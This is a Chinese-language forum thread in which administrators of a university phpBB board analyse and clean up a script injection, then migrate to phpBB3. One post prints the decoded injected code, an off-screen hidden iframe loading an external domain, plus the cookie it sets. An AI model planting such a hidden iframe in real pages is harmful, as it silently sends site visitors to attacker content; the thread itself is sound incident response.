病毒

假若各位使用者對於E-Offoce網站有"任何意見、問題"時,皆可在此發表.例如:申請版主、開立新板、功能測試、提供技術文章等等

版主: E-Office小組

分享到: Facebook

Re:病毒

文章XO » 週四 1月 17, 2013 7:09 pm

是喔~~~ 老眼昏花、沒細看、瞎猜! :oops: :oops:

BTW, Kevin 你剛剛的調整是不是造成現在文章編輯走了樣的原因?
php log 裡出現一些錯誤,感覺若不是換帳號造成,就是你限制新建帳號對資料庫的動作所致。
可有解法?

如果是你所知道的入侵方式,可有暫時的解法?
麻煩囉~~~

Paddy, Copyleft 在線上嗎?隔行如隔山... 我這三腳貓搞起這鍋來,事倍功半!
Help, help, help ~~~
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5330
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章korprulu » 週四 1月 17, 2013 7:39 pm

應該不是, 老師po了那段malicious script就這樣了XD 果然邪惡啊

前幾篇我po了個作法, 晚點再上去改改看

korprulu 寫:因為網站升級還要研究

所以目前的暫時的作法可以是,
1. 修改sessions.php裡的sql敘述都改用prepare statement,加強預防sql injection。
2. 將所有的session cookie都改成httponly,參照官方function說明,但有可能會對某些正常功能有影響(如果該功能需要在client端寫入session cookie的話)。
3. 找出入侵者injection的code並刪掉,我認為是在db的某個table裡,這比較麻煩,只能一個個找。
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章copyleft » 週五 1月 18, 2013 1:28 pm

XO 寫:是喔~~~ 老眼昏花、沒細看、瞎猜! :oops: :oops:

BTW, Kevin 你剛剛的調整是不是造成現在文章編輯走了樣的原因?
php log 裡出現一些錯誤,感覺若不是換帳號造成,就是你限制新建帳號對資料庫的動作所致。
可有解法?

如果是你所知道的入侵方式,可有暫時的解法?
麻煩囉~~~

Paddy, Copyleft 在線上嗎?隔行如隔山... 我這三腳貓搞起這鍋來,事倍功半!
Help, help, help ~~~


Paddy 出國旅遊去了。
我應該也是要看很久,畢竟也沒有玩很久了。

等週末有機會跟你們要 access 機器的方式。
這陣子謝謝老師跟 Kevin 的幫忙。
頭像
copyleft
E-Office 小組
 
文章: 1006
註冊時間: 週六 8月 07, 2004 11:27 am
來自: Taiwan

Re:病毒

文章XO » 週五 1月 18, 2013 1:37 pm

copyleft 寫:
XO 寫:是喔~~~ 老眼昏花、沒細看、瞎猜! :oops: :oops:

BTW, Kevin 你剛剛的調整是不是造成現在文章編輯走了樣的原因?
php log 裡出現一些錯誤,感覺若不是換帳號造成,就是你限制新建帳號對資料庫的動作所致。
可有解法?

如果是你所知道的入侵方式,可有暫時的解法?
麻煩囉~~~

Paddy, Copyleft 在線上嗎?隔行如隔山... 我這三腳貓搞起這鍋來,事倍功半!
Help, help, help ~~~


Paddy 出國旅遊去了。
我應該也是要看很久,畢竟也沒有玩很久了。

等週末有機會跟你們要 access 機器的方式。
這陣子謝謝老師跟 Kevin 的幫忙。


太好了!歷任站長們都出面了... 我還正納悶說你前此貼了個 PHP decoder 之後,怎麼就不見了ㄌㄟ?
EO 系統管理員密碼 我用 FB 訊息送給你。

麻煩囉... Paddy 那天 Facebook 聊過,他在 1/25 回台,寒假想來一次搞定升級成 Phpbb 3.x 版。
你過去有轉 藍精 BBS 文章的經驗,這次 phpbb2 轉 phpbb3 應該更駕輕就熟的吧!?

以後有事沒事都請找機會回到站裡來幫忙囉~~~ Thanks.
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5330
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週五 1月 18, 2013 3:31 pm

今早起來 6:49AM,登入 EO 檢視,發覺感染腳本變成只有 8 個 Files。
但是發現有 16 個檔案有被 touch 過 ...
日期為:2013/01/18,時間則從凌晨 2:50am 一直到 4:28am,約一個半小時的跨距。

核對了一下這 8 個感染 + 16 個 touched 過的
跟之前被感染的 23 個檔案,除了多增加一個 sessions.php 被 touched 過以外,其餘
完全一致。

不解是為啥少凱做了下面三項:
  1. Create a new user "eoffice" and only grant SELECT, UPDATE, INSERT, DELETE privileges on phpbb database.
  2. Turn off display_errors and turn on log_errors in php.ini. Don't show any error message to user. Log file is in D:\Web\logs\.
  3. Deny NetBios in firewall.


之後,就變成這樣了~~~

還有一個有趣的地方, phpbb\lindex.php (第一個字母是小寫的 L) 這個檔案是唯一一個被 touched 過,且內容有小改變,
在第 76 行處 (為便於檢視,我把他折斷為兩行):

代碼: 選擇全部
<body onload="alert('這個程式作業無效,即將關閉\n位址 0x0014680EF 記憶體不能為 Read。\n
While calling GDI.exe[color=red][b]\n以上都是假的!![/b][/color]')" bgcolor="FFFFFF">


紅色標示處是新增加出來的...

這讓我百思不解...
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5330
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週五 1月 18, 2013 8:28 pm

植入的碼解開來研究,發現基本上會在植入頁面(例如咱們 phpbb/index.php 這個 EO 首頁)被瀏覽時,動態產生
如下的 iframe

代碼: 選擇全部
<style>
    .s19fl1a2xrbe29 { position:absolute; left:-864px; top:-885px; }
</style>

<div class="s19fl1a2xrbe29">
    <iframe src="http://qkmicfzdddbf.myfw.us/ad/feed.php" width="590" height="589">
   </iframe>
</div>


隨網頁內容來到 Client 端的瀏覽器上,具體結果就是,瀏覽器會開一個 scroll window,去到 src 所指的網站
這裡是 http://qkmicfzdddbf.myfw.us/ad/feed.php ,去討 (你討她餵 -- 不然你以為 feed 啥意思?) 內容
通常就是廣告內容ㄇㄟ...

此外還會隨網頁 回傳的 HTTP Response header 裡,奉送如下小餅乾 (Cookie)

代碼: 選擇全部
__utmfr=3hnif58jdzpvi; expires=Fri, 25 Jan 2013 08:54:21 GMT; path=/


這會讓這個瀏覽者下次造訪這個被植入惡意碼的頁面... 在這裡也就是指下次造訪咱們這 EO 首頁時,把上述這個
小餅乾(此例小餅乾保存一個禮拜)傳到咱們 EO 伺服器上,就不知道這個亂數產生的小餅乾內容 3hnif58jdzpvi
傳回給被 injected 惡意碼的網站,他們會在後面勾搭幹些啥ㄌㄟ?
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5330
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章korprulu » 週五 1月 18, 2013 10:52 pm

老師,我沒有改session.php
因為我發現php有這麼一個設定magic_quotes_gpc,這個會自動把get, post, cookie所包含的特殊字元加slash(\),例如 ' -> \'
這選項預設是打開的,所以...我想入侵者應該不是透過cookie的injection這條路。

老師提到的幾個被改過的檔案室我改的,我發現他是直接修改檔案,如果該檔本來是唯讀,還會被取消唯讀
看來這入侵者已經有系統的最高權限了...

所以我就改幾個檔案,將malicious script刪掉,然後等看看他會不會再來改檔案,再去查log,看是哪個帳號或背後服務在做這件事
老師要不要更換個密碼?

建議先不要用IE來論壇
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章XO » 週六 1月 19, 2013 11:52 am

辛苦了!謝謝!

原來那些檔案是你改的呀?
今早該毒癮又犯了... 我都是用 codeBackup 的備份,透過 Beyond compare 比對資料夾,
recover those infected scripts, 固定都是那 23 個檔案。

你進來前不久,我才改過密碼。
我覺得應該是之前密碼被 Compromised 入侵,種下了些程式碼在我們系統內,經由上站使用者
瀏覽或使用站裡某些功能觸發的...

那些注入的碼初步看來沒啥大礙,只是會在 IE 開個 iFrame 去前述那個網站餵進來一些廣告(我猜啦),
無論是 IE、Firefox 或是 Chrome 只要 Cookie 功能沒被關掉,Cookie __utmfr 都會被寫入與傳回
eOffice,那個亂數產生的 Cookie 值,不知道傳回 EO 裡,那個被埋下的潛藏成是用來做啥?

那郭被導引過去的網址 http://qkmicfzdddbf.myfw.us/ad/feed.php 現在應該是在失聯狀態!

我的猜測,目前該程式植入程式碼的對象清單非常固定,若不是用檔案絕對路徑,就是用網站相對路徑
參照來感染的,也許可以試著把 Hosting web 的資料夾搬個家來試試!
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5330
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章XO » 週六 1月 19, 2013 11:56 am

BTW, 忘了提...

我用 Google Chrome 進 EO 時,出現首頁前,Browser 左上角會一閃而過
一個小畫面,看不清... 但是有瞥到狀似小紅傘的 Logo, 也許 Avira 是在警告
啥?

還有... 即便將腳本檔設為唯獨,照樣會被注入惡意碼,唯獨的屬性與檔案最後修改時間
也都維持不變!
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5330
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章albert.chen » 週六 1月 19, 2013 1:02 pm

老師學長們~辛苦了
我考完期末考後上來看才發現新增了那麼多討論
終於放寒假了,我現在也有空來一起幫忙
我覺得直接在D槽開一個Web_new的資料夾,並將phpbb3裝在底下,同時將舊資料庫轉移過去
phpbb2和phpbb3同時運作,觀察phpbb3底下的檔案是否也會被感染
如果不會的話,待所有轉移作業完成就可以eoffice的網址直接掛在phpbb3底下直接轉移過去了
不知道老師還有學長們覺得如何呢?
最後由 albert.chen 於 週六 1月 19, 2013 1:16 pm 編輯,總共編輯了 1 次。
頭像
albert.chen
漸有心得的高中生
 
文章: 155
註冊時間: 週五 6月 10, 2011 12:17 pm

Re:病毒

文章XO » 週六 1月 19, 2013 1:14 pm

albert.chen 寫:老師學長們~辛苦了
我考完期末考後上來看才發現新增了那麼多討論
終於放寒假了,我現在也有空來一起忙幫忙
我覺得直接在D槽開一個Web_new的資料夾,並將phpbb3裝在底下,同時將舊資料庫轉移過去
phpbb2和phpbb3同時運作,觀察phpbb3底下的檔案是否也會被感染
如果不會的話,待所有轉移作業完成就可以eoffice的網址直接掛在phpbb3底下直接轉移過去了
不知道老師還有學長們覺得如何呢?


可!
是不是可以研究一下:

  1. 讓 FTP 上下傳資料夾放在網路的網域範圍外。避免被利用放置 bad guy, 瀏覽那裏來觸發。
  2. 另外夾檔或上傳圖檔參照可找個相對路徑法,省得網站搬家網域名稱變更後失聯


另外備份可否也加入上傳檔案的資料夾。

待會兒上淡水... 可能周末不會上網!
最後由 XO 於 週六 1月 19, 2013 1:15 pm 編輯,總共編輯了 1 次。
eXtra Old 的是我「不是酒」哦!
제 이름은 오조휘 입니다

臉書裡依舊是 Extra.Old: http://www.facebook.com/extra.old
頭像
XO
資管系教師
 
文章: 5330
註冊時間: 週二 4月 27, 2004 12:20 pm
來自: CQ Inc.

Re:病毒

文章albert.chen » 週六 1月 19, 2013 1:15 pm

新發現:
在Apache的資料夾下httpd.conf也被植入以下設定:
ErrorDocument 500 /phpbb/lndex.php
ErrorDocument 404 /phpbb/lndex.php
ErrorDocument 402 /phpbb/lndex.php
已將其改回並設檔案為read only
頭像
albert.chen
漸有心得的高中生
 
文章: 155
註冊時間: 週五 6月 10, 2011 12:17 pm

Re:病毒

文章korprulu » 週六 1月 19, 2013 2:08 pm

學弟,這段是我加的 = =|||
是自訂錯誤頁面,可避免讓別人輕易知道使用的版本(如果管理者沒更新,可以借助來判斷是否有漏洞)
那頁面應該是前人做的,蠻有趣的,請加回去吧

albert.chen 寫:新發現:
在Apache的資料夾下httpd.conf也被植入以下設定:
ErrorDocument 500 /phpbb/lndex.php
ErrorDocument 404 /phpbb/lndex.php
ErrorDocument 402 /phpbb/lndex.php
已將其改回並設檔案為read only
最後由 korprulu 於 週六 1月 19, 2013 2:31 pm 編輯,總共編輯了 1 次。
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章korprulu » 週六 1月 19, 2013 2:12 pm

不錯喔,那來幫忙做ab traffic協助轉移好了

albert.chen 寫:老師學長們~辛苦了
我考完期末考後上來看才發現新增了那麼多討論
終於放寒假了,我現在也有空來一起幫忙
我覺得直接在D槽開一個Web_new的資料夾,並將phpbb3裝在底下,同時將舊資料庫轉移過去
phpbb2和phpbb3同時運作,觀察phpbb3底下的檔案是否也會被感染
如果不會的話,待所有轉移作業完成就可以eoffice的網址直接掛在phpbb3底下直接轉移過去了
不知道老師還有學長們覺得如何呢?
korprulu
懷疑的國中生
 
文章: 64
註冊時間: 週六 10月 04, 2008 4:33 am

Re:病毒

文章albert.chen » 週六 1月 19, 2013 4:12 pm

korprulu 寫:學弟,這段是我加的 = =|||
是自訂錯誤頁面,可避免讓別人輕易知道使用的版本(如果管理者沒更新,可以借助來判斷是否有漏洞)
那頁面應該是前人做的,蠻有趣的,請加回去吧

痾...學長不好意思
我還以為l(英文小寫L)ndex.php是惡意程式碼
已將此段加回去
頭像
albert.chen
漸有心得的高中生
 
文章: 155
註冊時間: 週五 6月 10, 2011 12:17 pm

Re: 病毒

文章albert.chen » 週二 1月 29, 2013 1:14 am

老師,已將phpbb3掛到eoffice.im.fju.edu.tw的網域
並將舊的phpbb2移植到93的測試機
183這台的phpbb2沒去更動他
並在apache中將phpbb2的資料夾移除php的功能

(目前91和93的機器不明原因皆無法連接上去)
頭像
albert.chen
漸有心得的高中生
 
文章: 155
註冊時間: 週五 6月 10, 2011 12:17 pm

Re: 病毒

文章Paddy » 週四 1月 31, 2013 3:49 pm

albert.chen 寫:老師,已將phpbb3掛到eoffice.im.fju.edu.tw的網域
並將舊的phpbb2移植到93的測試機
183這台的phpbb2沒去更動他
並在apache中將phpbb2的資料夾移除php的功能

(目前91和93的機器不明原因皆無法連接上去)


酷~
Good Job !!
頭像
Paddy
總版主
 
文章: 891
註冊時間: 週一 3月 01, 2004 7:20 pm
來自: NewOrleans

上一頁

回到 站務討論版

誰在線上

正在瀏覽這個版面的使用者:沒有註冊會員 和 1 位訪客